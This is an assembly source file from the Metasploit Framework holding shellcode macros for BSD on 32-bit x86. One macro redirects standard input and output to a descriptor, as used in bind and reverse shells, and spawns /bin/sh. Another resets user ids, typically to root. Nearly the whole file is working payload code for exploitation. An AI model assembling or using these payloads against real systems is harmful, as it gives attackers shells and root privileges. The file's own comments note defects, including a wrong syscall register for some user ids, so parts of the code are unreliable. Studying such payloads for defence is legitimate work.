GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/shellcode/bsd/ia32/generic.asm
;;
;
;        Name: generic
;        Type: Macro Set
;   Qualities: None
;     Authors: skape <mmiller [at] hick.org>
;     Version: $Revision: 1628 $
;     License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        This file provides a generic API of macros that can be used
;        by payloads.  No payloads are actually implemented within this
;        file.
;
; Macro List:
;
;        execve_binsh - Executes a command shell with flags
;        setreuid     - Set real/effective user id
;;
BITS 32                                 ; NASM: assemble everything below as 32-bit code

;;
; Define undefined assumptions
;
; ASSUME_REG_EDX and ASSUME_REG_EAX are assembly-time symbols through which
; the including file can state a register value it already knows at the point
; where a macro is expanded. The macros in this file test them with %if to
; pick between alternative instruction sequences. When the includer has not
; defined them they default to -1 here, which matches neither of the values
; the macros test for (2 for EDX, 0 for EAX).
;;
%ifndef ASSUME_REG_EDX
%define ASSUME_REG_EDX -1
%endif
%ifndef ASSUME_REG_EAX
%define ASSUME_REG_EAX -1
%endif
;;
;     Macro: execve_binsh
;   Purpose: Execute a command shell with various options
; Arguments:
;
;    Execution flags: Flags used for executing the command shell in a
;                     number of modes.
;
;       EXECUTE_REDIRECT_IO => Redirects stdin/stdout/stderr to the fd
;                              passed in 'edi' (or in 'ebx' when the
;                              includer defines FD_REG_EBX).
;
; Assembly-time inputs read by the macro:
;
;       ASSUME_REG_EDX == 2 => EDX is used as the descriptor counter and
;                              is not loaded; otherwise ECX is loaded
;                              with 2 and used instead.
;       ASSUME_REG_EAX == 0 => EAX is taken to be zero on entry, so only
;                              AL is written for the syscall number.
;       FD_REG_EBX defined  => the source descriptor is read from EBX.
;
; Notes for readers:
;
;   * Syscalls are made with 'int 0x80' and stack-passed arguments, with
;     one extra dword pushed last as a placeholder slot below the first
;     argument (the BSD ia32 convention this directory targets).
;   * Nothing pushed for a syscall is popped again, so every pushed dword
;     stays on the stack.
;   * The labels 'dup', 'dup_loop' and 'execve' are ordinary labels, not
;     macro-local (%%) ones, so a second expansion in the same assembly
;     unit would define them twice.
;   * When the redirect section is assembled, ASSUME_REG_EAX is redefined
;     to 0 and is not restored at the end of the macro.
;   * No instruction follows the final 'int 0x80'; if that call returns,
;     execution continues with whatever the includer placed after the
;     expansion.
;;
%define EXECUTE_REDIRECT_IO 0x0001

%macro execve_binsh 1

%if %1 & EXECUTE_REDIRECT_IO            ; redirect section only when the flag bit is set

dup:
%if ASSUME_REG_EDX != 2
    push byte 0x2                       ; counter = 2 (highest descriptor to replace),
    pop ecx                             ; loaded via push/pop instead of a mov imm32
%endif
dup_loop:
%if ASSUME_REG_EAX == 0
    mov al, 0x5a                        ; syscall 0x5a (90, dup2 in the BSD table); upper bytes assumed zero
%else
    push byte 0x5a                      ; eax = 0x5a (90, dup2) with the upper bytes cleared
    pop eax
%endif
%if ASSUME_REG_EDX == 2
    push edx                            ; arg 2: target descriptor = counter
%else
    push ecx                            ; arg 2: target descriptor = counter
%endif
%ifdef FD_REG_EBX
    push ebx                            ; arg 1: source descriptor held in ebx
%else
    push edi                            ; arg 1: source descriptor held in edi
%endif
%if ASSUME_REG_EDX == 2
    push edx                            ; placeholder slot below the arguments (value unused)
%else
    push ecx                            ; placeholder slot below the arguments (value unused)
%endif
    int 0x80
%if ASSUME_REG_EDX == 2
    dec edx                             ; next lower descriptor
%else
    dec ecx                             ; next lower descriptor
%endif
    jns dup_loop                        ; repeat for 2, 1, 0; fall through once the counter is -1

    ; From here on the macro treats EAX as zero -- presumably because the
    ; last call targets descriptor 0 and returns it on success. This is a
    ; global redefinition that outlives the macro expansion.
%undef ASSUME_REG_EAX
%define ASSUME_REG_EAX 0

%endif

execve:
%if ASSUME_REG_EAX == 0
    push eax                            ; zero dword: terminator for the path string
%else
    push byte 0x3b                      ; eax = 0x3b (59, execve in the BSD table)
    pop eax
    cdq                                 ; edx = 0 (sign extension of the positive eax)
    push edx                            ; zero dword: terminator for the path string
%endif
    push dword 0x68732f2f               ; ASCII "//sh" (little-endian)
    push dword 0x6e69622f               ; ASCII "/bin" -> stack now holds "/bin//sh",0
    mov ebx, esp                        ; ebx = address of the path string
%if ASSUME_REG_EAX == 0
    push eax                            ; zero dword: read as arg 3 and as the first slot of arg 2's array
%else
    push edx                            ; zero dword: read as arg 3 and as the first slot of arg 2's array
%endif
    push esp                            ; arg 2: address of the zero dword just pushed
    push ebx                            ; arg 1: path
    push ebx                            ; placeholder slot below the arguments (value unused)
%if ASSUME_REG_EAX == 0
    mov al, 0x3b                        ; syscall 0x3b (59, execve); upper bytes assumed zero
%endif
    int 0x80

%endmacro
;;
;     Macro: setreuid
;   Purpose: Set real and effective user id (the same value is pushed
;            for both arguments)
; Arguments:
;
;    User ID: The user identifier to setreuid to, typically 0.
;
; Notes for readers:
;
;   * The id is an assembly-time constant; %if picks how it is loaded
;     into EAX (xor for 0, push imm8 for values below 256, push imm32
;     otherwise).
;   * The syscall is made with 'int 0x80' and stack-passed arguments plus
;     one placeholder dword pushed last; none of the three pushed dwords
;     is popped afterwards.
;   * The label 'setreuid' is an ordinary label, not a macro-local (%%)
;     one, so a second expansion in the same assembly unit would define
;     it twice.
;;

%macro setreuid 1

setreuid:

%if %1 == 0

    xor eax, eax                        ; eax = 0

%else

%if %1 < 256

    push byte %1                        ; imm8 form of push (the CPU sign-extends imm8 to 32 bits)

%else

    push dword %1                       ; imm32 form for larger ids

%endif

    pop eax                             ; eax = id

%endif

    push eax                            ; arg 2 = id
    push eax                            ; arg 1 = id
    ; Only the low byte of EAX is replaced below. The upper 24 bits are
    ; whatever the id load left there: zero for %1 == 0 and for small
    ; positive ids, but not in general.
    ; NOTE(review): verify the resulting EAX for ids of 128 and above.
    mov al, 0x7e                        ; syscall 0x7e (126, setreuid in the BSD table)
    push eax                            ; placeholder slot below the arguments (value unused)
    int 0x80

%endmacro